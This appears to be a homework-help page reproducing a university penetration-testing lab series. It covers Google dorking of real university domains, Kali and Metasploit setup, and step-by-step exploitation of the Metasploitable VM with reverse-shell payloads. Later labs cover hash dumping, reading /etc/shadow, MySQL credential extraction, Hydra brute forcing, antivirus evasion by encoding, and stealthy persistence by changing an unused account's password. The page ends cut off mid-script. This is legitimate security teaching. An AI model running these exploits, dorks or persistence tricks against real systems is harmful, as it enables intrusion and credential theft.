User Account

All Pages

What new domains did you identify

Assignment Help Operating System
Reference no: EM131258803

Assignment

Part 1: Google Hacking Lab

This is an introduction to using search engines for penetration testing. "Google Hacking" is a valuable skill for penetration testers. Google's automated search algorithms constantly visit every IP in the world and collect information about the services that IP provides and indexes the content the IP makes available. Google hacking could be called an art. The information gathered is only limited to your ingenuity when crafting your queries. Keep in mind, the principles behind Google hacking apply to all search engines.

In this lab you will enumerate sub-domains, identify new machines, scour web servers for files that reside on directories but have been forgotten, learn about the underlying architecture of web servers, locate logon portals, and use targeted queries to locate specific file types. When clicking on links used the cached version so you visit Google's cache and not the website itself.

1. Open a browser and navigate to: google.com

2. We're going to search exclusively for Wilmu domains.

2a. Type: site:wilmu.edu

3. We received too many www.wilmu.edu returns for this search to be of use. Let's subtract some information from our query.

3a. Type: site:wilmu.edu -site:www.wilmu.edu -site:libguides.wilmu.edu

3b. What new domains did you identify?

4. Now let's see what systems provide directory listings. Directory listings are important because there is the potential you will be able to see the entire website's file structure. Also, many webmasters forget to remove content they no longer make visible with hyperlinks. This content is valuable for various information gathering and exploitation reasons because it could be old pictures, databases, password files, etc. (Be sure to click on the cached links and not the actual links.)

4a. Type: site:umass.eduintitle:index.of

5. Another search we might do is for error or warning messages that give us an indication of the underlying infrastructure and application. Depending on the error or warning we will be able to determine if the web server is running Apache, IIS, SharePoint, WordPress, etc. To do this we would use the "or" operator. A query with the or operator for warnings or errors would look something like this: intitle:"apache status" "apache server status for" | "welcome to windows small business server 2003"

6. Let's look for applications and databases we may login to. Many organizations use Federated rights, meaning once you're logged in you may login to other systems. This is called "single sign-on" or SSO.

6a. Type: site:wilmu.edu logon | login
6b. What Portals did you find?

7. We found some interesting portals but those are for students. Where else might a penetration tester look?

7a. Type: site:wilmu.edu faculty | staff | admin | administrator + login | logon
7b. What results did you find?

8. We've been looking for interesting information about sub-domains, posted on websites, logon portals, but what about the files themselves? Are some files extensions more promising than others? Let's find out by searching for different file extensions.

8a. Type: site:wilmu.eduext:pdf
8b. Type: site:wilmu.eduext:asp username

What link did you find that may be of use?

8c. Type: ext:mdb (mdb is a Microsoft Access database extension.)

Did you find any interesting results?

VMWare Home Lab Setup Instructions

1. Download all VMs.

1a. Download Kali VM: https://www.kali.org/downloads/
1b. Download Metasploitable 2 VM: https://information.rapid7.com/metasploitable-download.html
1c. Download VMware Player: https://my.vmware.com/web/vmware/free#desktop_end_user_computing/vmware_player/6_0
1d. Be sure to unzip all files.

2. Install VMWare Player.

3. Open VMware Player.

4. Click the "Open a Virtual Machine" option.

5. Navigate to the Metasploitable VM and select this file: Metasploitable.vmx

5a. If you get a prompt asking if you moved or copied the VM select: "I copied it."
5b. If you get a prompt asking if you want to download VMware Tools for Linux click "Download and Install".

6. Open a second instance of VMware Player.

7. Navigate to the Kali VM and select the .vmx file.

7a. If you get a prompt asking if you moved or copied the VM select: "I copied it."

Both your Kali VM and your Metasploitable VM should be running. Switch your focus to the Kali VM.

8. Type this username at the login prompt: root

9. Type this password: toor

We need to change the default password because it's not secure. While the password we're changing it to isn't necessarily secure (for the sake of simplicity in this class) we still need to change it on principal.

10. Type: passwd

11. Type: wilmu123

12. Let's update Kali so we have the latest updates.

12a. Type: apt-get update && apt-get upgrade

12b. Open the MSFConsole and type:

apt-get update
apt-get upgrade
apt-getdist-upgrade

Now let's switch our focus to the Metasploitable VM.

13. At the user logon prompt type: msfadmin

This is an intentionally vulnerable system so there's no point in changing the password from the default.

14. At the password prompt type: msfadmin

You are now ready to pen test!

Introduction to Metasploit - A Tour

Class:
Name:
Date:

What is Metasploit?

Metasploit is an open source framework for exploitation that has transcended its humble beginnings and become a "penetration testing environment suite" - my interpretation. I say this because you are now able to use Metasploit to accomplish any task in the penetration testing phase and based on your findings you may choose a tool/methodology, modify an existing tool/methodology, or create a new tool/methodology to accomplish your goal. While most penetration testing options like Canvas have additional options and features, none provide you with the freedom and flexibility that Metasploit does. So while Kali is a wonderful Linux-based operating system loaded with tools, a pentester has everything he or she needs in Metasploit. As you will soon learn in this course, Metasploit has reconnassiance tools (discovery and vulnerability scanners), malicious code generators, evasion apps so your exploit doesn't get caught by IPS or antivirus, password attack tools, and many, many more.

1.Open VMware and launch the Kali VM and login as root with your password wilmuabc.

2. Launch a shell. (It's the black box icon to the right of Applications, Places.)

3. Type: msfconsole

3a. Wait patiently for Metasploit to load.

3b. Open another shell and type: env (View the PATH variable. When you attempt to execute a program Linux looks at all of the paths in the PATH environment variable to find and execute the program. That's why you may type "msfconsole" and the program executes.)

4. If you visit the Rapid7 website you will find you have the option to register for notifications, support, and updates of Kali. Rapid7 has moved away from using SVN for code management to Git. For our purposes here it doesn't matter but if you enjoy working on the bleeding edge of distros you may want to register and upgrade to the latest version.

5. Switch your focus back to the Metasploit shell. Look at the information under the banner and answer the questions below about the various modules available.

5a. How many exploits does Metasploit have:

5b. How many auxiliary exploits does Metasploit have:

5c. How many post modules does Metasploit have:

5d. How many payloads does Metasploit have:

5e. How many encoders does Metasploit have:

5f. How many nops does Metasploit have:

Metasploit Modules Breakdown

I've defined Metasploit's modules below. Take the time to read them so you have a better understanding of their purpose and use.

Exploits - Pre-packaged malicious executables that takes advantage of a vulnerability to gain access to a system and deliver a payload.

Payloads - Can be a variety of applications/configurations used to establish foothold on system post-exploitation. Examples are reverse shells that call home or stagers for further exploitation and persistance. Meterpreter is a particularly useful and commonly used payload shell.

Encoders - Obfuscates exploits and payloads so they can't be fingerprinted by AV or IDS/IPS definitions.

Auxiliary - Attack components such as DoS tools, buffer overflows, SQL injection apps, fuzzers, and more.

Post - Automation modules for post-exploitation. Tools to further establish access on a system or network like keystroke loggers and privilege escalators.

NOPs - NOP sled tools such as buffer overflow reference material for custom NOP sleds. For simplicity's sake we'll say NOP sleds tell a processor to do nothing for a specified number of clock cycles, thereby increasing the chances of your code executing successfully.

With that brief introduction behind us let's learn by doing.

*You may want to maximize your shell to full screen.

6. Type: help (Notice the list of commands available to you in Metasploit.)

7. Type: show exploits (Wait patiently for the Metasploit database to be queried and print the results to your terminal.)

7a. Notice the format: Name, Date, Rank, Description

7b. What is the date of the "windows/http/sonicwall_scrutinizer_sqli" exploit?

7c. What is its rank?

7d. What is its description?

8. Encoders allow you to encode your payload so it doesn't trigger antivirus or IDS tools like McAfee's HBSS. This is very important to know and understand because most AV and IDS tools aren't going to catch your payload if you encode it.

8a. Type: show encoders
8b. Find and document an encoder here:

9. Payloads are the deliveries we will make to the system we are exploiting.

9a. Type: show payloads
9b. Find and document a payload for the Mac OS here:

10. We will use auxiliary modules quite a bit. There are a variety of community provided penetration testing tools located here.

10a. Type: show auxiliary
10b. Does the auxiliary module contain scanners?

Now let's get down to business and pretend we are professional penetration testers researching a strategy to gain access to an industrial control system network such as a water treatment plant.

11. We need to find a Windows SCADA exploit.

11a. Type every word after this colon: search windows/scada

12. Let's learn more about a particular module we found in our search results to confirm it will be useful to us.

12a. Type: info windows/scada/moxa_mdmtool
12b. Who provided this exploit?

12c. What are the options available for this exploit?

12d. What references are available?

12e. What does the description tell us this module does?

13. This may be the exploit we need to compromise the system.

13a. Type: use windows/scada/moxa_mdmtool
13b. Type: show payloads
13c. Document two payloads you would might use that are available for this exploit:

14. Type: show advanced

14a. These advanced options, for the most part, won't normally be changed by you. You will want to change them in some cases though. Scroll down to the SSL option. It's currently set to false. If you were running a reverse shell out of a network you may want to enable SSL not only to potentially hide your activity but to also protect your client. The last thing you want to do expose the client's data to a third party because you transferred it in clear text over the internet.

15. Type: show options

15a. These are the setting the exploit currently has.

16. Type: info

17. Type: help

17a. What command would you type to verify a system is vulnerable to this exploit?

17b. What command would use to execute the exploit?

18. Type: exit

Now let's take a look at how Metasploit's file system is organized.

19. Type: cd /usr/share/metasploit-framework/modules

19a. Type: ls (You should recognize the high level organization.)
19b. Type: cd exploits
19c. Type: ls (As you can see, you may drill down in each folder to view available tools Metasploit offers. Although this isn't necessary, it is good to understand how the Metasploit is organized for troubleshooting modules.)

You've gained a basic understanding of Metasploit's organization and how to explore this popular open source penetration testing tool suite. We'll gain a higher level of understanding and take part in a more advanced use of Metasploit in subsequent labs.

MetasploitMsfconsole Lab

Class:
Name:
Date:

1. Open VMware and launch the Kali VM and login as root with your password wilmuabc.

2. Open a shell by clicking on the little black box located at the top left of the desktop, to the right of the word "Places".

3. Type: service postgresql start

4. Launch Metasploit by typing: msfconsole

5. Type:db_status

6. Open another instance of VMware and launch the Metasploitable VM.

7. At the user logon prompt type: msfadmin

8. At the password prompt type: msfadmin

9. Type:ifconfig

10. Record the IP address here:

In this lab we'll be demonstrating the use of the msfconsole. We'll exploit a vulnerability of the Apache web server, deliver a payload, and confirm we have a reverse shell.

1. Switch back to Kali.

2. Type this and hit the enter key at the msf> prompt: db_nmap-p 1-1024 -sVx.x.x.x (IP address of the Metasploitable system that you recorded in Step 12.) We've just done a port scan on our target using Nmap. We've added our results to the Nmap database in case we need to retrieve the results for later review. We only scanned ports 1-1024 and we used the -sV switch on open ports to determine the application and version that is running.

5. What service is running on these ports:

(The command will take a couple of minutes to run.)

Port 21:
Port 22:
Port 23:
Port 25:
Port 53:
Port 80:
Port 111:
Port 139:
Port 445:
Port 512:
Port 513:
Port 514:

All of these ports and the services/applications running on them have the potential to be exploited but we have to determine the version of the software running on them.

6. Take notice of the TCP port 80. Apache httpd 2.2.8 (Ubuntu) is running. Let's see if we can find out more information about the software running on port 80.

7. Type: use scanner/http/http_version

8. Type: info (Make note of the RHOSTS option. We'll use that to specify the IP of our target.)

9. Type: set RHOSTS x.x.x.x (This is our target's IP.)

10.Type: set RPORT 80

11. Type: exploit

12. Take notice of the results: Powered by PHP/5.2.4ubuntu5.10

13. We just learned a little bit more about our Apache server running an Ubuntu OS. It's running PHP 5.2.4.

14. Let's find out what exploits exist for PHP. Maximize your VMware window and type: clear

15. Type and wait: search phptype:exploit

16. Type: use exploit/multi/http/php_cgi_arg_injection

17. Type: info

a. What version of PHP does the description say is vulnerable to this exploit?

18. Now that we believe we may have a working exploit let's view and choose the desired payload that is compatible with this exploit. Type: show payloads

19. We'll go with a stable and reliable reverse shell. Type: set PAYLOAD generic/shell_reverse_tcp

20. Type: setRHOST x.x.x.x (IP of target.)

21. Type: setLHOST x.x.x.x (Your IP.)

22. Type: set LPORT 1234

23. Type: show options (This will verify your changes. Make sure the options you have set are showing.)

24. Type: show advanced (Verify there is nothing else you want to change.)

25. Type: exploit

26. You may be asking yourself what, if anything, happened. Type: ls

a. How many files and folders were displayed.

27. Type: pwd

a. Document your present working directory.

28. Type: whoami

a. Document the name of the account you are logged on with.

29. Type: uname -a

30. Type: cat /etc/issue

Excellent! You've used the MSFconsole to run a port scan and save the contents of that scan to a database for later retrieval. You further investigated a port of interest by running an additional scanner against it and determined more information about the application and version information. You then searched Metasploit's database for applicable exploits. Once you found an appropriate exploit you determined the payload you will use, ran it, got a reverse shell, and verified connectivity by executing some simple commands. Congratulations!

Following these simple steps when trying to penetration test systems will aid you in better understanding the nuances of exploiting systems.

29. Press ctrl+c. Type "y" when prompted.

30. Type: back

31. Type: exit

Part 2: Metasploit Database Lab

1. If your VMs aren't already running, open VMware and launch the Kali VM and login as root with your password wilmuabc. *If Metasploit is loaded from a previous lab it must be closed.

2. Open a shell by clicking on the little black box located at the top left of the desktop, to the right of the word "Places".

3. Type: service postgresql start
3a. Type: service metasploit start
3b. Type: service metasploit stop

4. Launch Metasploit. Type: msfconsole

Once Metasploit launches we have to connect to the Postgres database.

5. Type: db_status (You should see a connection to the database.)

6a. Are we connected to a database?

6. If Metasploitable isn't already running open another instance of VMware and launch the Metasploitable VM.

7. At the user logon prompt type: msfadmin

8. At the password prompt type: msfadmin

9. Type: ifconfig

10. Record the IP address here:

Metasploit has a default relational database you can populate with data. The database is very useful for capturing and organizing penetration testing data that you may want to refer to again, use for automating penetration tests, share with others, create reports, etc. The database contains these tables: hosts, services, vulns, clients, loot (passwords, hashes, etc), and notes.

Useful database commands are:
db_connect (Connects you to an existing database.)
db_disconnect (Disconnects you from a database.)
db_driver (Allows you to specify the type of database you will be connecting
to: MySQL, SQLite, PostgreSQL, etc.)
db_status (Tells you the type of database you're connected to.)
db_export (Allows you export the contents of the database to XML.)

1. We know we are connected to the database so now let's populate it with target information. Switch back to your Kali VM and return to the Metasploit prompt msf>.

2. Type: db_nmapx.x.x.x (IP of your target.)

3. You've just added the contents of your nmap scan to the database. Let's view the individual tables.

4. Type: hosts

a. What hosts are listed in the table?

5. Type: services

a. What information is provided in this table?

6. We would normally also type "notes" or "loot" or "vulns" but we haven't populated the database with any of that information. FYI, the vulns information may be imported from .nessus files. If you're not familiar with Nessus Google it for quick reference. These tables will populate as you exploit systems.

Interact with a database when performing reconnaissance or running a vulnerability scan may not seem immensely helpful in a lab setting because we're only scanning 1 system but what if we were scanning 10 systems or 100 systems or 1000 systems or 10000 systems or even more? It is simply not feasible for a pen tester to scroll through the results and manually document interesting findings. That's where the beauty of logging our penetration testing results to databases really pays off. Being able to instantly reference all of the hosts we've scanned for a project or reviewing all of the possible vulnerabilities in systems we'll be exploiting is a professional approach to handling the mountains of data that may be generated during a customer engagement.

Part 3:Metasploit Database Lab

1. If your VMs aren't already running, open VMware and launch the Kali VM and login as root with your password wilmuabc. *If Metasploit is loaded from a previous lab it must be closed.

2. Open a shell by clicking on the little black box located at the top left of the desktop, to the right of the word "Places".

3. Type: service postgresql start

3a. Type: service metasploit start
3b. Type: service metasploit stop

4. Launch Metasploit. Type: msfconsole

Once Metasploit launches we have to connect to the Postgres database.

5. Type: db_status (You should see a connection to the database.)

6a. Are we connected to a database?

6. If Metasploitable isn't already running open another instance of VMware and launch the Metasploitable VM.

7. At the user logon prompt type: msfadmin

8. At the password prompt type: msfadmin

9. Type: ifconfig

10. Record the IP address here:

Metasploit has a default relational database you can populate with data. The database is very useful for capturing and organizing penetration testing data that you may want to refer to again, use for automating penetration tests, share with others, create reports, etc. The database contains these tables:

hosts, services, vulns, clients, loot (passwords, hashes, etc), and notes.

Useful database commands are:
db_connect (Connects you to an existing database.)
db_disconnect (Disconnects you from a database.)
db_driver (Allows you to specify the type of database you will be connecting
to: MySQL, SQLite, PostgreSQL, etc.)
db_status (Tells you the type of database you're connected to.)
db_export (Allows you export the contents of the database to XML.)

1. We know we are connected to the database so now let's populate it with target information. Switch back to your Kali VM and return to the Metasploit prompt msf>.

2. Type: db_nmapx.x.x.x (IP of your target.)

3. You've just added the contents of your nmap scan to the database. Let's view the individual tables.

4. Type: hosts

a. What hosts are listed in the table?

5. Type: services

a. What information is provided in this table?

6. We would normally also type "notes" or "loot" or "vulns" but we haven't populated the database with any of that information. FYI, the vulns information may be imported from .nessus files. If you're not familiar with Nessus Google it for quick reference. These tables will populate as you exploit systems.

Interact with a database when performing reconnaissance or running a vulnerability scan may not seem immensely helpful in a lab setting because we're only scanning 1 system but what if we were scanning 10 systems or 100 systems or 1000 systems or 10000 systems or even more? It is simply not feasible for a pen tester to scroll through the results and manually document interesting findings. That's where the beauty of logging our penetration testing results to databases really pays off. Being able to instantly reference all of the hosts we've scanned for a project or reviewing all of the possible vulnerabilities in systems we'll be exploiting is a professional approach to handling the mountains of data that may be generated during a customer engagement.

Part 4: Updating Metasploit Lab

1. Open VMware and launch the Kali VM and login as root with your password wilmuabc.

2. Open a shell by clicking on the little black box located at the top left of the desktop, to the right of the word "Places".

3. Launch Metasploit by typing: msfconsole

There are many reasons to update Metasploit. Updating Metasploit will install bug fixes, new community tools, and most importantly - add exploit modules. There are two ways to do this. Your first option is to update Metasploit in an automated fashion by typing "msfupdate" at the command line. This requires registration with Rapid7 for a community edition key. This will update Metasploit with the latest settings, ruby version, modules, etc. You may also simply update Kali by going to "Applications-System Tools-Software Update". The second way to update Metasploit is manually. Being able to update Metasploit is important because it allows you to import the latest exploits, regardless of where you find them, as long as they follow Rapid7's development rules for Metasploit modules. It's also important because the automated update tool will sometimes break your Metasploit install by modifying your Ruby version or making another change to your environment. This lab will focus on sharpening your skills as penetration testers by having you search for an exploit online, download the exploit, install the exploit, and test the exploit. There is a third way to update Metasploit - Build your own module. You'll have to know how to program in Ruby. You can learn more about Metasploit exploit development here: https://www.offensive-security.com/metasploit-unleashed/Exploit_Development

1. Using your Kali VM, open the Iceweasel web browser by clicking on the icon to the right of the word "Places" and navigate to: https://www.exploit-db.com/ Wordpress is a popular content management system used for blogging on the world wide web. It has been in the news recently for having multiple vulnerabilities.

2. Click on the "Search" button.

3. In the "Free Text Search" field type: Wordpress

4. Click "Search".

5. Look at the exploits and notice the information on the left of the screen. One of the most important things to notice is the check mark. The check mark indicates the exploit has been vetted by the Rapid7 community. It's critical that you only import and use trusted exploits. Otherwise, you could be importing a trojan horse, or worse, onto your system or your customer's system.

6. Go to page 9 and click on "Wordpress HMS Testimonials Plugin 2.0.10 - Multiple Vulnerabilities".

7. Who is the author of this exploit?

7a.

8. What date was this exploit published?

8a.

9. Now click the download icon next to these words "Exploit Code:".

10. What type of file is this?

10a.

11. Open the file that you downloaded. As you can see these are instructions for exploiting a WordPress vulnerability in the way user feedback may be posted. So how would you go about loading this module into Metasploit? You wouldn't. This is simply a text file that walks through manually exploiting WordPress but I chose to show it to you because, as you can see, when you're looking for the latest exploits you don't always need to load a module. There are hands-on instructions for exploiting this vulnerability. If there isn't a current exploit in Metasploit for your vulnerability be sure to check Exploit-db.com, not just for modules but also for hands-on exploit instructions.

Metasploit is built on the Ruby programming framework. This means that our modules need to be .rb files. Any exploits that we want to import will need to be converted to Ruby code if they aren't already.

12. Close the text file and return to the web page. Go to page 9 and locate this exploit and click on it: Wordpress W3 Total Cache PHP Code Execution

13. Click the download icon. When prompted to save the file name it: wordpress_w3_php_code_exec.rb Hit the drop-down arrow next to "Save in folder:" and select "Desktop".

14. Click "Save".

15. Minimize all of your windows. You should see a Ruby file on your desktop.

16. Switch your focus to your Metasploit instance. How many exploits are listed? Type: banner

16a.

17. Now it's time to import your new Ruby file to the Metasploit framework. Open a shell by clicking on the black box next to the word "Places" at the top of your desktop screen. Type this to copy in your new exploit: cp/root/Desktop/wordpress_w3_php_code_exec.rb
/usr/share/metasploit-framework/modules/exploits/multi/php

18. Switch back to your Metasploit shell and type: reload_all

19. How many exploits do you have now?

19a.

20. Type: use exploit/multi/php/wordpress_w3_php_code_exec

21. Type: info

What does this module do?

21a.

You now have a better understanding of when to download an exploit versus updating your entire Metasploit install. You've downloaded an exploit that you needed and manually added it to Metasploit. You've looked for a recently published exploit, download it, copied it to the appropriate location within Metasploit, and verified its availability as a module.

Now let's look at the professional version of Metasploit.

Type: go_pro

Follow the prompts to upgrade your Metasploit version from the framework edition to the professional version.

Part 5: Metasploit Scanning Lab

1. If your VMs aren't already running then open VMware and launch the Kali VM and login as root with your password wilmuabc.

2. Open a shell by clicking on the little black box located at the top left of the desktop, to the right of the word "Places".

3. Type: msfconsole

4. Open another instance of VMware Player and launch the Metasploitable VM.

5. At the user logon prompt type: msfadmin

6. At the password prompt type: msfadmin

7. Type: ifconfig

8. Record the Metasploitable VM IP address here:

Metasploit has numerous scanners located in various places. Let's become familiar with how to find and identify the scanners we need. Not all scanners are built alike. Some are very limited but very good at what they do while others are more broad in functionality and applicable in many instances.

Switch to you Kali VM and type "back" if you currently have a module loaded from a previous lab.

1. Open another shell and type: ls /usr/share/metasploit-framework/modules/auxiliary/scanner/portscan

2. These are just a few of the built in port scanners Metasploit has to offer.

2a. What port scanners are available?

3. Pick one and list the options and advanced options.

3a. Switch to your Kali VM and type: use auxiliary/scanner/portscan/xmas
3b. Type: show options
3c. Type: show advanced

4. Type: back

5. Switch to the other shell (Not Metasploit.) and type: ls /usr/share/metasploit-framework/modules/auxiliary/scanner/discovery

6. Notice we have more discovery tools.

6a. List a tool and what it does.

6b. Switch back to your other shell and type:

use auxiliary/scanner/discovery/arp_sweep

6c. Type: show options

6d. Type: show advanced

7. Let's search for more scanners.

7a. Type: search type:auxiliary scanner

7b. If you have trouble reading the output make sure your shell is maximized as well as your instance of VMware.

8. What scanner may I use to brute force Outlook Web Access logins?

8a. Type: search type:auxiliary outlook

8a. Who wrote the module? Type: info

8b. Type: info auxiliary/scanner/http/owa_login

9. What is the pcanywhere_login module good for?

9a. Type: search type:auxiliarypcanywhere_login

9b. Type: info auxiliary/scanner/pcanywhere/pcanywhere_login

Now let's learn how to use the "info" command to gather information about modules.

10. Type: info auxiliary/scanner/mssql/mssql_ping

10a. What does this module do?

Now let's look at everyone's favorite scanner Nmap. Nmap is a tool every pen tester, system administrator, network administrator, etc, should be familiar with.

*If you currently have a module loaded type: back

1. Type "nmap". Notice the exhaustive output. The switch syntax is given along with a description of the command.

2. Type: nmap -sTx.x.x.x (x.x.x.x. is the IP address of the Metasploitable VM.)

2a. What were some of your findings?

3. Now that we've used Nmap to find and scan a host let's see if we can connect.

4. At the msf console type: connect help

4a. View the options.

5. To verify a port is open on your target and you can connect to it type "connect -z x.x.x.x 21" This will connect you to the FTP port on your target system, if the FTP service is running.

5a. Go ahead and see if you are able to connect to the target using the above command. What are the results.

6. Now that you know the FTP port is open you can search for exploits. Type: search platform:linuxtype:exploit ftp

6a. List two exploits.

We've explored scanning with Metasploit by searching for multiple scanner modules, loading them, and exploring their functions. We also used an industry favorite, Nmap, to target our victim VM. We connected to an open port to confirm connectivity and then looked up available exploits in the Metasploit database. In the labs ahead we'll be using the information we've gathered to continue looking up exploits and leveraging them against vulnerabilities.

Part 6: Armitage Lab

1. Open VMware and launch the Kali VM and login as root with your password wilmuabc.

2. Open a shell by clicking on the little black box located at the top left of the desktop, to the right of the word "Places".

3. DO NOT LAUNCH METASPLOIT

4. Type: service postgresql start

5. Launch your Metasploitable VM.

6. At the user logon prompt type: msfadmin

7. At the password prompt type: msfadmin

8. Type: ifconfig

9. Record the IP address here:

Armitage is described as a "cyber attack management tool". Armitage is a GUI for Metasploit. It does not replace Metasploit but it does provide a way to visualize your targets. It also makes the use of Metasploit collaborative by being able to support more than one user at the same time. Armitage has other features such as suggestions. While Armitage is heavily integrated with Metasploit it does not entirely replace the command line so the command line is still available from within the GUI. We will explore the use of Armitage in this lab to gain a better understanding of its capabilities as a penetration testing tool.

1. Using the shell you already have open in your Kali VM type: armitage

2. Click "Connect" at the first prompt and then "Yes" to start the service that connects to the Metasploit database. (Accept the defaults. Do not change the IP address from 127.0.0.1.)

3. Click "Hosts-Add Hosts" and enter the IP of your Metasploitable VM.

4. (ONLY DO THIS IF YOU HAVE UNWANTED HOSTS.) Remove any unwanted hosts that populate from the Metasploit database from previous scans. Right-click on the unwanted host and select "Host-Remove Host".

5. Look at the "Console" tab at the bottom left of the screen. Type "hosts" at the msf prompt and hit Enter. What is the result?

6. Type: servicesWhat is the result?

5. Right-click on the Metasploitable host computer icon top-right frame and select "Scan". This triggers multiple scans. Module after module is loaded, run, and then the results are automatically written to the Metasploit db.

a. What scan launches first?

b. What does it find?

b. What FTP version is running?

c. What SSH version is running?

d. What version of web server is running and on what OS?

e. What Windows/Linux domain integration and file server software is running?

f. What version of MySQL is running?

g. What version of Postgres is running?

6. Wait until all of the scans have completed and then go to the "Attacks" menu at the top of the Armitage window. Select "Find Attacks" and wait for a prompt confirming attacks have been added. This can take up to 10 minutes. Be patient and wait for the prompt.

7. Right-click on your target and notice "Attack" has been added to the menu.

8. Right-click on your target and select "Attack-FTP-vsftpd_234_backdoor". Accept defaults and click "Launch". If that attack doesn't work then click on "Attacks-Hail Mary".

9. Once the Linux box has turned red and appears to have lightning around it click within the "Console" tab at the bottom left of your screen.

Type: sessions

a. What IP are you connected to?

b. What type of connection do you have?

9. Right-click on the compromised target and select "Shell 1-Post Modules".

10. Select the "hashdump" post module from the tree in the left-hand pane by double-clicking on it. (You will have to scroll down. It's under "gather".) Go with the defaults and click "Launch". What information populated in the new tab?

11. Go to the "View" menu. Select "Loot". What is the Loot tab telling you?

12. Now let's enumerate the system with Armitage. In the top left window pane navigate to "post-linux-gather" and select the enum_system post module by double-clicking on it. What types of information was gathered?

13. Go to "View" and select "loot".

a. What was added to your loot?

b. What is it possible to do with your loot?

c. What should you do next?

14. Right-click on the compromised target and select "Shell 1-Interact".

15. Type: whoami

15a. Who are you logged in as?

16. Type: pwd

16a. What is the present working directory?

17. Type: ls

18. Type: adduser bob

18a. Follow the prompts to create a new user on your target. If you are continuously prompted for bob's information skip to step 19.

19. Click on the Console tab at the very left of the bottom pane. Type "sessions -K" to kill all sessions.

20. Switch to your Metasploitable VM.

21. Type: exit

22. Login with user account "bob" and enter your password.

Final thoughts: Notice under the "Hosts" menu you have many important scanning options: Nmap, MSF Scans, DNS Enumeration Try using them against your target. Armitage is a fun and useful tool for quickly throwing exploits at systems to see what sticks and then playing with post modules in a controlled environment. It's also a fantastic way to visualize all of your compromised systems. This is especially important if you have a lot of compromised systems. You have the ability to pass off sessions to your coworkers if you so choose, further strengthening the advantages of this unique and powerful open source penetration testing tool.

Part 7: Database Attack Lab

This lab will follow a database penetration test from beginning to end in order to illustrate, in a hands-on way, the steps necessary to fully compromise a database. You will use a Metasploit module to identify an account you may use to login. Once logged in you will use SQL commands to explore the database.

1. If Metasploitable isn't already running launch the Metasploitable VM.

2. At the user logon prompt type: msfadmin

3. At the password prompt type: msfadmin

4. Type: ifconfig

5. Record the IP address here:

6. Now switch to Kali.

7. Open a shell by clicking on the black box next to the word "Places".

a. Type: service postgresql start
b. Type: service metasploit start
c. Type: service metasploit stop

8. Type: msfconsole

9. Scan your target for database technologies. Try to identify running database services on your target's ports. Type: nmapx.x.x.x

10. Success! We're identified multiple instances of database technologies running on our target. Let's choose a service to target. For this example we'll select MySQL.

11. Metasploit has multiple MySQL exploits. Type: search mysql

12. Type: use auxiliary/scanner/mysql/mysql_login

13. Type: info

14. Type: set rhostsx.x.x.x (IP of Metasploitable VM.)

15. Type: set username root

16. Type: set stop_on_success true

17. Let's confirm the changes you made took. Type: info

18. Type: exploit

19. You determined the username root has no password. Congratulations. Let's test our access to the MySQL database.

20. Open a new shell by clicking on the black box to the right of the word "Places".

21. Type: mysql -h x.x.x.x (IP of Metasploitable.) -u root

22. Type: show databases;

23. Let's pick a database and explore it. Type: use dvwa;

24. Now that we've picked a database let's view the tables. Type: show tables;

25. Let's see what data is being held in this table. Type: show columns from users;

26. Columns of interest are "user" and "password". Type: select user, password from users;

27. You've successfully scanned for a database technology, found a vulnerable database service running on a target's port, located the appropriate exploit for use and ran it. Now try exploiting a different database vulnerability, such as Postgresql.

Congratulations, you've used a Metasploit module to attack a database. You've accessed a database, enumerated the tables, identified fields of interest, and inspected their contents.

Part 8: Network Attack Lab

In this lab we will explore Metasploit network share exploitation.

28. If Metasploitable isn't already running launch the Metasploitable VM.

29. At the user logon prompt type: msfadmin

30. At the password prompt type: msfadmin

31. Type: ifconfig

32. Record the IP address here:

33. Now switch to Kali.

34. Open a shell by clicking on the black box next to the word "Places".

35. Let's look for network share technologies in use. Type:nmap -A -p 139,445 x.x.x.x(IP of Metasploitable.)

We've gathered information on the network share technology being used. Now let's launch Metasploit and use the relevant attack modules to exploit vulnerabilities in the network sharing technology we've identified.

36. Launch Metasploit. Type: msfconsole

37. Let's search Metasploit's database for samba exploits. Type: search samba

38. Type: use exploit/multi/samba/usermap_script

39. Type: info

40. Type: set rhostx.x.x.x (IP of Metasploitable VM.)

41. Type: set payload cmd/unix/reverse

42. Type: set lhostx.x.x.x (Your IP.)

43. Let's confirm the changes you made took. Type: info

44. Type: exploit

45. Type: whoami

46. Type: pwd

47. Type: cat /etc/shadow

48. Type: cat /etc/passwd

Mission accomplished!

Closing thought: "whoami" returned "root". You could create an account and set the password or you could use the "passwd" command to change the password on an account that hasn't recently been used. That way if the /etc/passwd or /etc/shadow file are examined no new accounts would be identified. The possibilities are only limited to your imagination.

Part 9: Password Brute Forcing Lab

1. Open VMware Player and launch the Kali VM and login as root with your password wilmuabc.

2. Open a shell by clicking on the little black box located at the top left of the desktop, to the right of the word "Places".

3. Open another instance of VMware Player and launch the Metasploitable VM.

4. At the user logon prompt type: msfadmin

5. At the password prompt type: msfadmin

6. Type: ifconfig

7. Record the IP address here:

Hydra is a password brute forcing tool that supports many protocols. These are just a few of the protocols: Samba, Cisco, IMAP, POP3, FTP, LDAP, Telnet, HTTP Auth, VNC, MySQL, NNTP, SNMP

Let's look at Hydra's options.

1. Switch your focus to the Kali VM and, using the shell you already opened, type: hydra

1a. Observe the commands available to configure Hydra.

We need wordlists to perform our bruteforcing.

2. Type: cd /usr/share/wordlists

The wordlist we want is zipped up to save space. Let's unzip it.

3. Type: gunzip rockyou.txt.gz

Now let's use Hydra.

4. Type: hydra -l ftp -P /usr/share/wordlists/rockyou.txt -f -v x.x.x.x (target IP address) ftp

What is/are the password(s) to the ftp user account?

4a.

Let's test our findings.

5. Type: ftp x.x.x.x (IP of Metasploitable)

6. Type your username you found.

7. Type your password you found.

Confirm you have logged in.

8. Type: quit

As you can see, Hydra is a powerful password brute forcing tool. Some applications of this tool are readily obvious. Hydra may be used to test systems over the internet such as MySQL databases or Cisco devices.

But what about offline password cracking? John the Ripper is a popular password cracking tool. It cracks password hashes offline, meaning you've gathered the password hashes from sources such as a Windows SAM file or a Linux shadow file and you are now going to run John the Ripper against those password hash files. To learn more about John the Ripper type: John Linux Audit Script Tutorial

You are going to create a Linux audit script. This script will demonstrate how to create an audit script, execute it, and read the contents of the file that is created. This is a short tutorial.

Open your Kali Linux VM. Launch a shell.

Type: nano

Enter this information:

===BEGIN SCRIPT===

#!/bin/sh

AUDIT_RESULTS="/tmp/audit_results"

echo "===OPERATING SYSTEM & KERNEL INFORMATION===" > $AUDIT_RESULTS

uname -a >> $AUDIT_RESULTS

echo "===SYSTEM RESOURCE USAGE===" > $AUDIT_RESULTS
free>> $AUDIT_RESULTS

